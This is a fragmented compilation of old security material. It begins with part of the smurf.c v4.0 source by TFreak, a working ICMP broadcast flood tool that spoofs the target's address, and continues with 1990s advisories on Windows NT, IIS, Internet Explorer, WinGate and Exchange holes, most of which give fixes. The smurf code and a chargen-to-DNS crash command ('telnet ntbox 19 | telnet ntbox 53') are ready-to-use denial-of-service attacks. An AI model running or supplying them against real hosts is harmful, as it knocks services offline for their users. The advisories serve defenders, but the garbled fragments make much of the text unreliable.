= atoi(argv[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lay = atoi(argv[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ktsize = atoi(argv[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bcastfile = fopen(argv[2], "r")) == NUL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error("opening bcast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it(-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x =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ile (!feof(bcastfi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gets(buf, 32, bcast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buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) contin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i = 0; i &lt; strlen(buf); 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buf[i] == '\n') buf[i] =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castaddr[x] = malloc(3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rcpy(bcastaddr[x], bu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castaddr[x] = 0x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close(bcast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x == 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printf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[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it(-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pktsize &gt; 1024)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printf(stderr, "ERROR: packet size must be &lt; 1024\n\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it(-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sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) &lt; 0)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error("getting sock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it(-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tsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&amp;bcast, sizeof(bca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intf("Flooding %s (. = 25 outgoing packets)\n", argv[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i = 0; i &lt; num || !num; i++)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i % 25)) { printf("."); fflush(stdo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murf(sock, sin, inet_addr(bcastaddr[cycle]), pktsiz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yc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bcastaddr[cycle] == 0x0) cycle =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leep(del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uts("\n\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turn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oid banner (voi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uts("\nsmurf.c v4.0 by TFreak\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oid usage (char *pro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printf(stderr, "usage: %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n\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rget = address to hit\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cast file = file to read broadcast addresses from\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um packets = number of packets to send (0 = flood)\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cket delay = wait between each packet (in ms)\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cket size = size of packet (&lt; 1024)\n\n", pro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it(-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oid smurf (int sock, struct sockaddr_in sin, u_long dest, int psiz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ruct iphdr *i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ruct icmphdr *icm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ar *pack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cket = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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 = (struct iphdr *)pack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cmp = (struct icmphdr *) (packet + sizeof(struct iphd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mset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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gt;tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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gt;ihl = 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gt;version = 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gt;ttl = 25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gt;tos =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gt;frag_off =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gt;protocol = IPPROTO_ICM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gt;saddr = sin.sin_addr.s_add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gt;daddr = d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p-&gt;check = in_chksum((u_short *)ip, sizeof(struct iphd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cmp-&gt;type = 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cmp-&gt;code =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cmp-&gt;checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psiz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ndto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psiz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 (struct sockaddr *)&amp;sin, sizeof(struct sockadd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ee(packet); /* free will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oid ctrlc (int igno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uts("\nDon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it(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signed short in_chksum (u_short *addr, int l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gister int nleft = l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gister int sum =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_short answer =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ile (nleft &gt; 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um += *add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left -= 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nleft == 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_char *)(&amp;answer) = *(u_char *)add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um += answ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um = (sum &gt;&gt; 16) + (sum + 0xfff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um += (sum &gt;&gt; 1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swer = ~su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turn(answ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5] SLMail Security Probl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und by David LeBlanc (from ntsecurity.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vid LeBlanc wri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ersion 2.5 (current version) is vulnerable to a buffer overrun attack on the POP3 service. If the username supplied is too long, the service will fail with a memory exception. To the best of our knowledge, there are no current exploits which can cause remote execution, but given the characteristics of the failure, it seems entirely possible that this could occur. At the very least, it constitutes a denial of service which will require rebooting the server if attacked. We notified Seattle Lab of this problem two months ago, and they did not seem to understand the severity of the probl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opping the Probl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pgrade to version 2.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6] IE 4.0 and DHTM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und by Ralf Hueskes (ntsecurity.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robl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dangerous security hole in Internet Explorer 4.0 was detected by Ralf Hueskes of Jabadoo Communications when he conducted a series of security tests for C'T computer magaz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is tests revealed that it is possible to spy on the contents of any text and HTML files on somebody else's computer. Not only local files are in danger, but also data on your company's intranet - even if it is protected by a firew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ecurity hole exists even if users have activated the highest security level in their browser. The problem affects both the German and the English version of the Internet Explor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de needed for infiltrating your files can be hidden in any normal Web page or in an e-mail mess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chnical Detai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py pages make use of JScript. If a user accesses a page or receives an e-mail containing this code, infiltration begin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py page contains a so-called IFRAME sized 1 by 1 pixel. When a user accesses the page or opens the e-mail message, a small Jscript program loads the HTML or text file to be spied on into this frame. The contents of the frame can then be read using Dynamic HTML and sent as a parameter hidden in a URL to any Web server in the Inter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tective Measur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ccording to Ralf Hueskes of Jabadoo Communications, the security hole exploits an error in the Internet Explorer 4.0 that can be fixed only by the manufacturer. Microsoft is aware of the problem and will make available a patch for download from http://www.microsoft.com/ie/ on October 17th 199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perienced users can protect themselves by completely deactivating the execution of Active Scripting in the security settings (menu item: Tools/Options/Security, Settings/Custom (for expert users)/Active Scripting/Disable) and by using the Security Zones feature in Internet Explorer 4.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7] 2 NT Registry Ris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und by David LeBlanc (ntsecurity.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robl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ttack was described most adequated in the ISS X-Force Security Advis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SS Security Ale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ctober 21, 199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cheduler/Winlogin Keys have Incorrect Permiss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advisory describes two similar configuration problems in the Windows NT Registry key permissions. These vulnerabilities can allow users with Server Operator privilege to increase their access level to Administra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blem 1: Scheduler Key Has Incorrect Permiss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ffects: Windows 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scription: The HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule key controls the schedule service. Server Operators have permission to write to this registry tree, which would allow them to manually schedule jobs to be run by the schedule service, which normally executes under the system user context. This can be used to raise the Server Operator's access level to Administra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isk: Mediu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lution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Schedule key for Server Operato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blem 2: Winlogon Key Has Incorrect Permiss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ffects: Windows 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scription: The HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon key has two values which can be used to cause a process to execute upon either system bootup, or when a user logs on. The programs pointed to by the System value run under the system user context after boot, and could be used to change a user's rights or access level. The UserInit value runs applications when a user logs in. The default settings for this key allow Server Operators to write these values, either of which could be used to raise a System Operator's access level to Administra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isk: Mediu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lution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Winlogon key for Server Operato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ution: Care must be taken when using the Registry Editor. If incorrect values are entered, the system may become inoperable. Should a mistake be made when editing the registry values, the registry state can be restored to the state at the last time the system booted up. For more information, see the Windows NT Help under the "Registry" sec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cknowledgments: This problem was identified by David LeBlanc of ISS (dleblanc@iss.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8] Wingate Proxy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und by Bill Mattoc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robl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ttack was described most adequated by the person reporting it to us, Bill Matto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recent hole has been discovered in the default security settings of a popular Windows 95 / Windows NT proxy server called WinGate, by Deerfield Communic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bug was discovered by a 15-year-old hacker, Joshua E. Rodd, whose e-mail address is jerrod@ibm.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a semi-well-known anti-spammer, I am active in the Usenet newsgroup known as news.admin.net-abuse.email. Recently, we anti-spammers came under attack by person or persons unknown, who was sending us a variety of hateful e-mail, seemingly from different dialup ISP ports around the worl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was fortunate enough to observe two such attacks in progress, and I telnetted to the IP addresses indicated by the headers on the e-mail messages. In each case, I was greeted by a "WinGate&gt;" prompt, although the IP addresses were differ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pparently, a number of other anti-spammers got the same "hate" e-mail, and notified the ISP that the e-mail appeared to be coming from - in at least one case, a dialup user lost their access because of the complai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Because I had seen a "WinGate" prompt at two different IP addresses were the attacks seemed to be originating from, I decided to do a little digging. I discovered that the text of the message contained some mispellings that were unusual. I used DejaNews to search for those mispellings, in conjunction with the word "WinGate." I thereby discovered young Mr. Rod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 had discovered this bug, had written an exploit for it, and had written a netscanner which would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the default state of these servers), one could telnet into and then back out of the WinGate server, which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming from the location of the WinGate server. This exploit was used to harass anti-spammers with untraceable e-mail, but one could well imagine that it could be used for a variety of other attac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is easy to see that this type of IP laundering would be simpler to perform than IP spoofing, and nearly as bulletproof in terms of being untrace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oshua has, unfortunately, disseminated his hacking tools far and wide by now, as he was quite proud of his abilit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nformation has been reported by C/Net news last week, and has been given to Deerfield Communications as well. Michael Deerfield is the CEO of the corporation, and he is quite concerned, but he is also understandably quite concerned about the potential publicity damage to his company. He was initially a bit hostile, posting messages in Usenet news to the effect that this type of "wide open" behaviour of his WinGate Proxy server was "by design," and was totally secure. He failed to immediately grasp that although the INTERIOR of the proxy server probably is safe from attack, the rest of the Internet is not safe from this exploit, which would result in fingers of blame being pointed back at his innocent clintele, and then eventually to WinG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nGate has indicated that this "bug," which they still claim is not a bug, has been repaired in the newest version of WinGate, v2.0. However, WinGate is available as shareware, and Deerfield Communications has estimated that there are hundreds of thousands of copies of the older software in circulation. Deerfield HAS placed simple instructions on disabling telnet on their web page, with a quick description of why a sysadmin would want to do s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nformation has been reported to CERT at cert@cert.org, however, they have not responded at this time, and it has been nearly two weeks since I reported it. Vint Cerf has also been notified, and he assigned an MCI security person to look into it, and that person has not responded to me at this time, either (after an initial e-mail message, that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this is not an exploit designed to penetrate a network, nor is it an Denial of Service attack, I believe that many people are pooh-pooh'ing the incident, and I have heard comments to the effect that "all firewalls and proxy servers are like that." Perhaps so, but I only know of this one at this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0.9] O'Reilly Website uploader Ho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und by Herman deVet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s running Website(c) with uploader.exe in place are vulnerable. Website ships with a program called UPLOADER.EXE that allows compatible Web clients to upload files to the Web server. Using the UPLOADER.EXE application with a modified HTML page will allow an attacker to upload an file the attacker wish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llowing is from Herm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rogram uploader.exe doesn't check anything at all. If you're lucky, you're running Windows NT and have put only "read/execute access" on CGI-WIN and other executable paths. Otherwise (win95) you have a real problem. You could create a CGI program, next you change the HTML file a little like th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pen the HTML file in your browser, select a nice CGI file to upload and run that CGI program remotely. (No need to tell you what this CGI program could do, could be .bat file too in one of Website's other CGI directo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rman de Vet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Stop the problem, get rid of the uploader.exe application and ftp your inform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0] Exchange 5.0 Password Cach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und by Rajiv Pa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change 5.0 Server's POP3 service has a bug in it that causes the system to not properly flush cached passwords. Old passwords will continue to be valid along with newly set passwords. This problem will persist until the cache is flushed. David LeBlanc points out that Microsofts FTP, HTTP,and Gopher service also suffer from the same problem. The problem does not affect NT logins themselv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correct the problem, you must edit the following registry key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LM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credenti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ache Age Limit (Default = 120 minu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LM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credenti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ache Idle Limit (Default = 15 minu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LM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credenti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ache Size (Default = 256 bucke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ke the settings =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1] Crashing NT using NTF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und by Martin Stiemerl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ffects NT systems running Service Pack 3 als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cently, a program released from Germany (crashnt.exe) seems to be able to crash an NT server. The program was coded by Martin Stiemerling. It executes in a command window and functions off of one parameter, a drive letter. (example: crash d:). It seems that the program may be a spawn of an NT Defragmentation program. The fact that this program will crash and render an NTFS volume useless is spook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vid LeBlanc says he thinks this may be a result of something in the NtFsControlFile() fun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2] The GetAdmin Explo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und by Konstantin Sobolev</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GetAdmin program originated in Russia and has the ability to add users to the Administrators group. No special permissions are needed to execute the program, which interestingly runs through a telnet session as well. Microsoft released a patch that they said stops the attack. If however, you run crash4.exe on the server first and then run GetAdmin, the exploit still works. (All of the executables discussed here are available in the tools se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3] Squid Proxy Server Ho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und by Fred Albrech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someone FTP's into site via URL, the password the user uses could possibly be recovered from NetScape Communicator or from the logs of the Squid Proxy server (versions 1.1.10 and 1.1.1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Excerpt from ntsecurity.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thod for tes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Start NS Communicator 4.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 Enter a URL of the form "ftp://user@host.domain.xx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 Communicator pops up a password entry dialog. Enter the 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 When the file list is displayed in the browser window, follow the "Parent Directory" lin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5. Click the BACK button (seems to be optional in Linu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assword is now plainly visible in the URL field, similar to the follow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tp://user:passwd@host.domain.xx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ll explain this out a bit clearer bel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rmally, if a site allows anonymous FTP, this means you don't need a username and password pair to login. You just use "anonymous" and your email addr for the password and you're in - which is handled transparently by your browser when used for FTP access. But if the site is regulated, and requires a username password pair, then you'd be prompted by Communicator 4.0 if, and only if, you used Communicator to FTP to that protected si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et's say you want to FTP to a site which is protected. You'd enter a URL like this: "ftp://yourname@ftp.someftpsite.com - at which point Communicator connects to the site, and pops up a window asking you to enter your password that matches the "yourname" user account. You enter the password, click OK, and it sends it to the site for authentication. BUT, IT ALSO PUTS IT IN THE HISTORY FILE OF COMMUNICATOR in this format: "ftp://yourname:password@ftp.someftpsite.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 you can see, in the beginning, the URL did not have the password included. But, once you enter the password using Communicator 4.0, it gets added to the URL and put in the history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fore, anyone with access to your Communicator would have access to your history file, and thus, the stored passwords - should there be an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 aware that it has been reported that JavaScript can access the history list, meaning a malicious Web page could be grabbing passwords from your browser without your knowled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SO - it appears that the Squid Proxy Server is in fact writing the user's password in plain text to its own logs as well - which we should all know is a bad th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scape says the root of the problem lies in the Squid Proxy, not Communica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opping the Attack : Don't use Communicator for FTP'ing to sites that require a username and password. Use a standalone FTP client instead, until Netscape releases a fi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3.1.4] Internet Information Server DoS attac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ound by Todd Fa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You can crash an IIS box by sending a large URL to it (4-8K). --To Quote ntsecurity.net According to Microsoft personnel, "it's a very specific boundary condition when parsing the headers. The end of a token (method, URL, version or header) must be exactly at 8k, followed by a second token. Our max header buffer is 8k, anything beyond gets thrown out as an invalid request. In this particular scenario, an index gets misinterpreted as a pointer so we deref 0x00002000 which lo' and behold, doesn't exi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topping the Attack : Load the patch available from microsof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5] Ping Of Death I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und By Jiva DeVo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keeping with the tradition of the first ping of death, Ping Of Death II (Or SPing) sends multiple 64k packets, which still become fragmented and will cause a windows system to lock up complete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opping the Attack : Block all inbound ICMP traff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6] NT Server's DNS DoS Att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om ntsecurity.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icrosoft DNS can be made to crash by redirecting the output of the Chargen service to the MS DNS service. A typical attack might be launched from a system using the following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elnet ntbox 19 | telnet ntbox 5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bove command is shown as seen on a UNIX command line. Once the command is issued, a telnet session is opened on port 19 (chargen) of the ntbox, and all output is redirected to a second telnet session opened on port 53 (dns) of the same ntbox. Launching the attack in this manner may subject the attacker to the same barrage of packets the DNS service will experience. But none-the-less, the attack is successful in crashing MS D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opping the Attack : Stopping the attack is done by performing one of the follow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n't run MS DNS until it's proven to be less bug ridden. Instead, you may opt for running a free version of BIND for NT which is not subject to this attack. If you rely on MS DNS interoperating with WINS, you may opt for MetaInfo's DNS, which is a direct BIND port and works great in conjunction with WINS. If you must go on using MS DNS, be forewarned that it may be incredibly difficult to stop this attack, since it can be done through impersonation and by using non-standard ports for charg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can block port TCP port 53 using NT's built-in TCP/IP filtering. This stops zone transfers and TCP based name resolutions. This does not stop the UDP port 53 from continuing to operate normally. DNS normally relies on UDP for its name resolution transac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r, you can filter TCP port 53 on your routers to bordering networks, allowing only trusted secondary DNS servers to do zone transf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y one of the above three solutions should help you stop the attack col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type of attack (pointing chargen output to other ports) can go along way towards bogging down lots of services, some of which die like MS DNS. You'd be well advised to disable NT's Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services. Any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping. If you find the need to run one or more of these services independant of the others, you can turn on/off each respective service by adjusting Registry entries found in the following subtr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LOCAL_MACHINE\CurrentControlSet\Services\SimpTcp\Paramet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y changing the established value of both the EnableTcpXXXX and EnableUdpXXXX parameters from 0x1 to 0x0, you effectively disable that particular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llowing parameters are available for adjust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TcpCharg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TcpDay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TcpDisca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TcpEch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TcpQot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UdpCharg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UdpDay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UdpDisca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UdpEch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ableUdpQot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 CAREFUL WHEN MAKING REGISTRY CHANGES, AS ERRORS CAN RENDER A SYSTEM NON-BOOT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ep in mind that this does not stop attacks that originate from other system's chargen ports, nor will it stop impersonated port attac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7] Index Server Exposes Sensitive Materi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und by Andrew Smi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e of the components of Index Server (which is the internal search engine component thats part of Internet Information Server.) can expose material of a highly sensitive nature. This component, webhits.exe allows the web server to read files it would normally not be able to read. If the administrator of the server has left the default sample files on IIS, a hacker could easily have the ability to narrow their searches for usernames and passwords. Once an intruder has located an IIS box that has these default samples still on the server, the intruder can use the sample search page to specify only files that have the word password in them and are script fi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URL the hacker would try is http://servername/samples/search/queryhit.htm then the hacker would search with something like "#filename=*.as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en the results are returned not only can one link to the files but also can look at the "hits" by clicking the view hits link that uses the webhits program. This program bypasses the security set by IIS on script files and allows the source to be display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default path to webhits.exe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ttp://servername/scripts/samples/search/webhits.ex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opping the Attack : Remove webhits.exe or move it from its default loc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8] The Out Of Band (OOB) Att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s a DoS attack that affects NT and 95 machines alik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Quote ntsecurity.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ow it Wor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ttack is done by sending Out of Band (OOB) data to an established connection. NetBIOS, which listens on port 139 among others, seems to be the most affected - but the attack may work against MS-DNS running on port 53, causing massive Event Log entries related to "select() errors", as reported by David LeBlanc. Apparently the OS doesn't know how to handle OOB data properly, so it may panic, causing strange things to happen. NT displays the Blue Screen of Death (BSOD) indicating TCPIP.SYS as the cuplrit, and definately requires a reboot after being attacked. Windows 95 may or may not crash completely, but always presents a blue exception screen, indicating MSTCP and NDIS as the culprits. Win95 always stops talking on the network after the att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OPPING THE ATT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lock inbound access to port 139 at your router. Alternatively you can stop the server service on NT systems, but this renders the box unable to share objects such as printers and directories. You may also use the built-in NT TCP/IP filtering to block non-local network access to port 13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regards to Windows 95 machines, the only way right now to disable port 139 is to unload network drivers completely, or use a packet filter to block traffic to port 139 on that machine, as mentioned abo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1.9] SMB Downgrade Att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y 6, 1997 - 3pm CST [NTSD] - On the heals of April's RedButton exploit comes yet another demonstration of attacking NT networks. A new program has just been released, complete with source code, that will downgrade a Server Message Block (SMB) negotiation - the standard handshake that occurs when a client attempts to connect to an NT Server. Downgrading the authentication causes the client to send its password in clear text, unencrypted - Ouch. This has been a known possibility for quite some time, however no one has released a working program along with source code up until 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rogram actually runs on a Windows based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon detecting one, the software sends a single packet to the client instructing it to downgrade its connection attempt to a clear text level - at which point the client silently obeys by sending its password in clear readable text. Once this happens this little piece of software actually grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none-the-wiser that its password has just been grabb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der Windows networking, when a client creates a new connection to an NT Server, the clients can be instructed to use a particular authentication mechanism: clear-text or challenge/response. As a result, clients can be instructed to transmit their password in clear text form very easi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urthermore, if an NT Server requested an encrypted login from the client, NT will authenticate the client, even if the client submits the password in clear text after being told to send an encrypted challenge/response answer. To make matters worse, there is no indication that this is taking place, and there is no way to provide an audit trail on the NT Server that indicates the clients are using clear-text passwords - even though the server has requested encrypted authentication. Perhaps NT should in fact be capable of logging an audit trail on this type of activity (hint hi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result of this design characteristic, a rogue client could sit on your network silently listening for username and password pairs traveling across the network during authentication. No physical access or user rights and permissions are required for this attack to work! All that's need is a connection to your network between the clients and serv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I said, this type of SMB downgrade attack has been a known possibility for quite some time - as noted in the Common Internet File System (CIFS) specification (section 8.5.2) - and similar, although not quite the same types of exploits have been demonstrated recently by various college students attempting to show vulnerabilities in Internet Explorer and Windows NT. Previously, NT LAN Manager negotiation and hostile SMB servers were shown to effectively initiate, intercept, or intervene in certain aspects of the client/server authentication pro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erson bringing this new program to our attention, David Loudon, has suggested that, "Microsoft could initially create a server patch that would not allow the NT Server to accept clear text passwords. While this does not prevent the exposure of the clear-text password, at least the administrator would be alerted that clients were sending clear-text passwords when requested to send encrypted passwords. To completely resolve this issue, all Microsoft networking clients must be replaced with new code that would never send clear text passwords during the authentication proc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long as Microsoft networking is enabled on any DOS, Windows 3.1, Windows for Workgroups, Windows 95, or Windows NT clients, users are susceptible to disclosing their clear text passwords to other devices on the physical network. Resolving this issue requires an administrator to update the Microsoft networking components on all affected desktops as soon as a fix is available from Microsof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icrosoft is definitely aware of this issue, and it appears that this type of functionality was knowingly put in place in order to remain backward compatible with older Microsoft clients like DOS. As a result, don't expect to see a fix for this until Service Pack 3 comes out, and maybe even la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new CIFS Authentication proposal seems to address this issue and a few other potential nasty security problems, but there is no guarantee the new CIFS specs will make it into SP3 yet. The probable outcome is that the new CIFS Authentication specification, which is being hashed out in a public forum on the Internet, will contain newfound configuration switches that can force the client and/or servers to require either clear text or encrypted negoti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0] RedButt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om ntsecurity.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new program was released this weekend that allows ANYONE with remote access to an NT server (using ports 137, 138, and 139) to connect to that machine, read the registry, and create a new share accessible to the Everyone group. This is a SERIOUS problem that should be guarded against at all costs. A quick test of this new RedButton program shows that it does in fact connect to a remote NT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ministrators should seriously consider blocking access to ports 137, 138, and 139 on any machines exposed to the Internet. You can also stop the Server service to protect yourself, although doing so eliminates the ability for that server to share resour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other consideration is to edit the Registry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Open HKEY_LOCAL_MACHINE/CurrentControlSet/Control/SecurePipeServ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 Create a key called winreg (if it doesn't exi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 Set the security on it however you like, but don't give the Everyone group access - but don't define Everyone with NO ACCESS either as this locks out all accou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4. Reboot the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dButton was released by MWC, security consultants, who are maintaining a Web page about the new RedButton software at http://www.ntsecurity.com/redbutton. NOTE: This Web address is ntsecurity.com - not associated with NTSD or ntsecurity.net. We are not responsible for content at thier si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dButton wi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logon remotely to a target computer without presenting a username and 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gain access to the resources available to the Everyone gro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determine the current name of built-in Administrator accou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read several registry entries and display the inform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list all shares - even hidden shar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icrosoft released a HOTFIX for the RedButton problems on May 3, 1997. Be CERTAIN to read the Knowledge Base articles and README files in the distribution directory - this software hotfix installs itself without warning so be careful to understand it completely before proceed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1] FrontPage WebBot Ho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om ntsecurity.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icrosoft has uncovered a bug in the Microsoft FrontPage Server Extensions that allow knowledgeable users to potentially add content to pages on a Web site without permission through use of raw HTML. This can only happen i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meone viewing a Web page has an advanced mastery of HTM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Web site is hosted on a server that contains the FrontPage server extens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Web page contains a Save Results WebBot Component or a Discussion WebBot Compon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nce raw HTML is not filtered out of entries made in the entry fields of the Save Results or Discussion WebBot Components, it is possible for a knowledgeable person browsing a site to enter the tags necessary to create a form within these fields. If the results page is then fetched for browsing the newly inserted form will be available for use by anyone browsing the site. The result is that anyone browsing could then append information to pages in the Web site even though they do not have authoring permis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fter isolating the bug and replicating it we concluded the best way to address the issue was to create new versions of the FrontPage 97 Server Extensions. These Server Extensions are being made immediately available at no charge to all of our users via download from the FrontPage Web site at http://www.microsoft.com/frontpage/softlib/current.htm. In addition, we are in the process of proactively sending a set of the updated FrontPage 97 Server Extensions to all Internet Service Providers we know of that are currently using the FrontPage Server Extensions, and we will also include them in the Windows NT Server Service Pack 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ssue came to our attention within the last two weeks from a Microsoft employee creating a Web site with FrontPage. Since then we have been confirming and replicating the error to ensure that it was not an isolated incident. As far as we know, this issue has affected no one outside of Microsof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bug affects Web sites created with FrontPage 1.1 for Windows and FrontPage 97 with Bonus Pack for Windows that are hosted on Web servers with any version of the FrontPage Server Extensions installed. However, it only affects those sites that contain the WebBot components described abo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y web server with the FrontPage 97 or 1.1 Server Extensions installed and active FrontPage webs with the WebBots specified above are potentially at risk. If the server has server-side include capability enabled then the potential exposure is higher. However, server-side includes are a Web server feature that should be carefully evaluated by any Internet server owner regardless of whether the FrontPage Server Extensions are install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ssue is most likely to be a problem for Internet Service Providers who are hosting webs on the Internet with the FrontPage Server Extensions. However, FrontPage 97 automatically installs a web server onto the workstation in order to store Web sites on the workstation for local authoring and staging. Consequently each workstation with FrontPage 97 should be upgraded with the new version of the FrontPage 97 Server Extensions for maximum security. If your workstation does not have a full-time connection to the Internet and you connect occasionally through a modem then the risk of exposure is low but still present, and Microsoft recommends that you install the new Server Extens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2] IE and NTLM Authentic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om ntsecurity.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new problem discovered in MS Internet Explorer shows that NT transparently negotiates an authentication attempt with a remote Web server any time that remote server requests an NTLM authentication process. During that process, Internet Explorer will transmit your user name, password, NT domain or workgroup name, and host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ke note here that during this negotiation process, two versions of the user password are transmitted. One is the full length password and the other represents the first 14 characters of the password, transformed in to upper case letters. This fact alone is a GREAT argument for longer passwords - longer that 14 chars that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E clients cannot detect whether or not this negotiation process is taking place, which makes it incredibly difficult to anticipate. Furthermore, IE can't determine what server it's talking to -- that is to say, it doesn't know if the server is a valid system to negotiation with -- which means it could be a rogue system. A server could preplan an attack by precomputing a giant database of potential passwords, which can be used for comparis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s NOT an SMB issue, this is an NTLM iss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example is on the page where this was first announced. Please click here to jump to the original p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LU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can protect yourself right now by stopping the NTLM SSP service, and disabling it. You may do this using Control Panel | Services, but keep in mind this may adversely affect the operation of the NT system - we take no responsib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icrosoft knows about this problem, and is looking in to it as of March 14, 1997. Watch this page for more inf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3] Run Local Commands with I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om ntsecurity.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 icon can be embedded within a web page, which when double-clicked, may run a remote application without warning. This is NOT the same bug as the ".LNK and .URL" problem discovered recent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ccording to the author, "this bug only effects Internet Explorer 3.0 users (version 4.70.1215). The problem is significantly more serious if the user is on a platform with CIFS (Windows NT 4.0 with Service Pack 1 or later installed). If this is the case, the location of the malicious executable code to be run on the victim's machine could be anywhere on the Internet. If this is not the case, the location of the machine containing the code is restricted to within the scope of Windows name resolution. For example, the host must be either on the same subnet, listed in the victim's LMHOSTS file, or listed on the victim's WINS ser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ternet Explorer enables a user to utilize a URL describing a remote directory. When clicked, the desktop moves to a Windows Explorer window -- but it's inside of Internet Explorer. If this URL is used as the basis for an &lt;IFRAME&gt; tag, an embedded frame can be created with what is essentially a Windows Explorer window inside. If this window is made small enough, it appears to be some sort of button, which when clicked runs a remote program. CIFS allows a machine to use the IP or hostname provided in the URL as a way of contacting the remote host containing the executab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4] IE can launch remote app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om ntsecurity.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icrosoft Internet Explorer v3.01 has a serious bug which allows web page writers to use ".LNK" and ".URL" files to run programs on a remote computer. This bug is particularly damaging because it uses NO ActiveX, and works even when Internet Explorer is set to its highest security level. It was tested on Microsoft Internet Explorer Version 3.0 (4.70.1155) running Windows 95. Microsoft says that users running Internet Explorer 3.0 and 3.01 for Windows 95 and Windows NT are affected. It does not affect users of Internet Explorer 3.0 / 3.0a for Windows 3.1 or Internet Explorer for Macintosh 2.1 / 3.0 / 3.0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RLs work in both Windows 95 and Windows NT 4.0 -- .LNK's only work in Windows 95 -- .URL files present a possibly greater danger because they can be easily created by server side scripts to meet the specific settings of a user's system. We will provide .URL files for execution in the next day or so on this p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hortcuts" can be set to be minimized during execution which means that users may not even be aware that a program has been started. Microsoft's implementation of shortcuts becomes a serious concern if a webpage can tell Internet Explorer to refresh to an executable. Or worse, client side scripts (Java, JavaScript, or VBScript) can use the Explorer object to transfer a BATCH file to the target machine and then META REFRESH to that BATCH file to execute the rogue command in that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META REFRESH tag can be used to execute multiple commands in sequence. This demo copies a .BAT file into your Internet Explorer cache and then runs the .BAT file. This .BAT will create a new key in your registry called "HKEY_CURRENT_USER/Software/Cybersnot". It will then open your AUTOEXEC.BAT and CONFIG.SYS in notepad. Finally, it will open REGEDIT so that you can view the key it creates. According to its author, the demo below does not destroy anything and should not cause any problems on your system. HOWEVER by downloading it, you assume complete liablity for what it may do to your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5] Password Grabbing Troja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om Jeremy Allis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am posting this to both the Samba list and the nt-security list as I believe this information will be of interest to both groups. This message is somewhat long and contains code fragments so my apologies if this is of no interest to you (just hit delete :-). Over several years helping to write Samba and dealing with UNIX and NT integration problems one of the most common requests I have seen is some way to get a UNIX box (maybe running Samba) to act as a NT domain controller, or for some way to unify the password databases between UNIX boxes and NT Domains. The first problem is not solveable due to the amount of Microsoft proprietary information they would have to reveal, and MS are not willing to make that available. The second problem however, is more tractable. It seems in NT4.x Microsoft have finally revealed enough information to make synchronisation between UNIX and NT password databases possi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c'ing from a UNIX box to an NT box was always possible, as the API's to change an NT password have always been available in the old Lanman API set, the difficulty was sync'ing NT password changes to a UNIX box, as the password change API's always seemed to go into a 'black box'to which no external access was available. It had to be possible, however, as NT Domains are perfectly capable of synchronising with Netware LANs. As the password hash mechanisms in NT and Netware are different the Netware password update mechanism had to be able to get at the plaintext password at the update time, before it got hashed and placed in the NT SAM. This mechanism is now available to other libraries on NT 4.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 NT 4.x there is a Ke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LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ls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d one of the defined name/value pairs is "Notification Packages" which is a Multi_string value which as shipped has a value of FPNWCLNT. This is obviously the name of a DLL (as I found it as FPNWCLNT.DLL in %SYSTEMROOT%\SYSTEM32) and logic would dictate that this was the place that the Netware password updates were done. The latest Microsoft SDK held the missing part of the puzzle, the neccessary API's that need to be in such a DLL in order for it to get password change notification. So here below, is a very simple DLL that will receive plaintext password change notifications from the NT LSA code. The sample code just logs all password change notifications to a file called C:\TEMP\PWDCHANGE.OUT, but it illustrates the technique. To test it, comple the C code and .DEF file into a DLL called pwdchange.dll, copy it to %SYSTEMROOT%\SYSTEM32 update the val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KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packag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re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PNWCL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WDCHAN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B. The newline between the two is *important*). and then reboot the machine. Tests show that all password changes are now funnelled through this DLL with the following information, Username, Plaintext password, RID (relative domain id). More interesting is that on creation of a new user this DLL is also called, this could be used to do centralized account management by creating a new UNIX user on the fly as a new NT user is created. Such a library would be installed on the Primary domain controller for an NT domain, and will then allow all users passwords to be propagated to non-NT systems as they are changed. The useful thing about this method is that it gets called on *all* forms of password update, from using CTRL-ALT-DEL to update your password, using USERMGR to change a password, or even by using the net user &lt;username&gt; &lt;password&gt; command from the command promp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y own uses for this will be to keep an smbpasswd file up to date for the use by Samba, but a proposed mechanism to keep a UNIX password database in synch would be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 Keep the notify DLL simple, as it is called in the context of an NT security system - we don't want complexity here. Just write the change information down a named pipe from the D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 Create a service, that creates the read end of the above named pipe. This service is configured with the following information, held in the regis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The name of the UNIX machine and TCP port number of a process on it to communicate wi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 A 'secret' DES key (secret in quotes as anyone with Administrator access could read it) which is used to encrypt the change notifications going across the net. This service would just read password change notifications, encrypt the data and ship it to a UNIX machine where it could be processed. This service can get as complex as we like, with queueing, retry, handshaking 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 Create a UNIX daemon, running as root, listening on the TCP port named above for password change data. This daemon also needs access to the 'secret' DES key to decrypt the data (probably in a root owned and read-only be root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daemon could then be configured to keep whatever databases residing on the UNIX side in sync are required. Suggestions are the UNIX password database, the Samba database, a Kerberos password database, 